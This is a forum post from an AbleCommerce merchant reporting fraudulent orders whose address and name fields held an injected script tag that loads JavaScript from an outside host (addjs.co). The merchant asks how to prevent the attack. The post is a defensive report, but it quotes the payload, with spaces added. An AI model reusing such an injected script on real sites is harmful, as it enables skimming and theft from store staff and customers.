logo
Welcome to our new AbleCommerce forums. As a guest, you may view the information here. To post to this forum, you must have a registered account with us, either as a new user evaluating AbleCommerce or an existing user of the application. For all questions related to the older version of Gold and earlier, please go to AbleCommerce Gold forum. Please use your AbleCommerce username and password to Login. New Registrations are disabled.

Notification

Icon
Error

Options
Go to last post Go to first unread
IDAutomation  
#1 Posted : Thursday, March 25, 2021 9:53:01 AM(UTC)
IDAutomation

Rank: Member

Groups: Authorized User, Developers
Joined: 11/13/2018(UTC)
Posts: 23

Thanks: 16 times
Was thanked: 1 time(s) in 1 post(s)
Yesterday morning, we received a strange order. The billing and shipping information was for New Hampshire but the IP location was Singapore. For our customer base, this kind of scenario usually means a fraud attempt. This is not totally uncommon and we have procedures for this. But, I noticed something different about this order in that it had the following in Address Line 2 fields:

< script src = //addjs.co > < /script >

I've spaced out various parts of the code because i thought that would render it inoperable. I removed this code from the address line 2 field and followed our process for handling refund orders. This morning I received another of these same types of orders, with the same script in the Last Name field.

I do not know much about this other than the fact that it is a JavaScript Injection attempt. But to what end? What measures can we take within the AbleCommerce system to prevent this type of thing from happening again?

Wanna join the discussion?! Login to your AbleCommerce Forums forum account. New Registrations are disabled.

Users browsing this topic
Forum Jump  
You cannot post new topics in this forum.
You cannot reply to topics in this forum.
You cannot delete your posts in this forum.
You cannot edit your posts in this forum.
You cannot create polls in this forum.
You cannot vote in polls in this forum.